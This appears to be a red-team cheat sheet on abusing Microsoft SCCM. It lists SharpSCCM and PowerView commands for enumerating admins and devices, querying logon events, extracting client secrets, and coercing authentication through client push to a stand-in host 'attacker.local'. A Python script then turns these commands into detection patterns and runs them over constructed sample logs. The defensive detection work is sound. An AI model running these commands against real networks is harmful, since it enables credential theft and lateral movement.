SCCM Abuse

System Center Configuration Manager / Microsoft Endpoint Configuration Manager

Enumeration

Look for the SCCM client agent process (CcmExec.exe) on the host:

Cmd > tasklist | findstr CcmExec

Search for SCCM servers in LDAP by computer name (PowerView):

PV3 > Get-DomainComputer -LDAPFilter "(&(objectClass=computer)(cn=*sccm*))" | select -ExpandProperty dnsHostName
PV3 > Get-DomainComputer | ? {$_.Name -like "*sccm*"} | select -ExpandProperty dnsHostName

VNC-like Remote Control (CmRcViewer Abuse)

Tools

MalSCCM

sccmwtf

SharpSCCM

Get the SMS (Systems Management Server) Provider and the SC (Site Code) used by the -sms/-sc options below:

Cmd > SharpSCCM.exe local site-info

List SCCM admins:

Cmd > SharpSCCM.exe get admins -sms <SMS> -sc <SC>

List devices together with their latest user logons (filtered by user name):

Cmd > SharpSCCM.exe get class-instances -sms <SMS> -sc <SC> SMS_R_System -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -w "LastLogonUserName LIKE '%snovvcrash%'"
Cmd > SharpSCCM.exe get devices -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -u snovvcrash@megacorp.local

Get the resource ID of a device (e.g. a server):

Cmd > SharpSCCM.exe get resource-id -sms <SMS> -sc <SC> -d <RESOURCE>

Execute a query on a resource via the AdminService (this example pulls recent 4624 logon events from the Security log):

Cmd > SharpSCCM.exe invoke admin-service -sms <SMS> -sc <SC> -q "EventLog('Security',4h) | where EventID == 4624 | order by DateTime desc" -r <ID>

Grab secrets from the local SCCM client (disk method):

Cmd > SharpSCCM.exe local secrets -m disk

Coerce authentication from the SCCM server via client push installation (remotely):

Cmd > SharpSCCM.exe invoke client-push -t attacker.local
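As an added defensive example (not code from this page or from SharpSCCM), the triage script below turns the SharpSCCM sub-commands listed above into detection patterns and runs them over constructed process-creation records. It keys on the sub-command verbs rather than the binary name, since the binary is trivially renamed. The key=value log format, the sample lines and the severity mapping are assumptions made for this example.

```python
import re

# Constructed process-creation records (Sysmon EID 1 / 4688 style, key=value).
# Sample data built for this example, not real telemetry; note the renamed binary.
SAMPLE_LOG = r"""
host=WS01 user=MEGACORP\alice image=C:\Windows\System32\tasklist.exe cmdline="tasklist /svc"
host=WS01 user=MEGACORP\alice image=C:\Users\alice\s.exe cmdline="s.exe local site-info"
host=WS01 user=MEGACORP\alice image=C:\Users\alice\s.exe cmdline="s.exe get admins -sms SCCM01 -sc PS1"
host=WS01 user=MEGACORP\alice image=C:\Users\alice\s.exe cmdline="s.exe local secrets -m disk"
host=WS02 user=MEGACORP\bob image=C:\Windows\CCM\CcmExec.exe cmdline="C:\Windows\CCM\CcmExec.exe"
host=WS01 user=MEGACORP\alice image=C:\Users\alice\s.exe cmdline="s.exe invoke client-push -t attacker.local"
"""

# Sub-command verbs taken from the SharpSCCM invocations on this page, with an
# assumed severity for triage (our own labels, not SharpSCCM's categories).
SHARPSCCM_VERBS = [
    (r"\blocal\s+site-info\b",                "low",    "site-info discovery"),
    (r"\bget\s+admins\b",                     "medium", "SCCM admin enumeration"),
    (r"\bget\s+(class-instances|devices)\b",  "medium", "device/last-logon enumeration"),
    (r"\bget\s+resource-id\b",                "medium", "resource-id lookup"),
    (r"\binvoke\s+admin-service\b",           "high",   "query via AdminService"),
    (r"\blocal\s+secrets\b",                  "high",   "client secret retrieval"),
    (r"\binvoke\s+client-push\b",             "high",   "client-push auth coercion"),
]

# key=value pairs; a quoted value (group 3) may contain spaces, an unquoted one (group 4) may not.
KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')

def parse_record(line):
    """Turn one key=value record into a dict."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(4)
            for m in KV_RE.finditer(line)}

def classify(cmdline):
    """Return (severity, label) hits for a command line, matched case-insensitively."""
    return [(sev, label) for pat, sev, label in SHARPSCCM_VERBS
            if re.search(pat, cmdline, re.IGNORECASE)]

def triage(log_text):
    """One finding per matching record: (host, user, image basename, severity, label)."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_record(line)
        for sev, label in classify(rec.get("cmdline", "")):
            findings.append((rec["host"], rec["user"],
                             rec["image"].rsplit("\\", 1)[-1], sev, label))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding)
```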
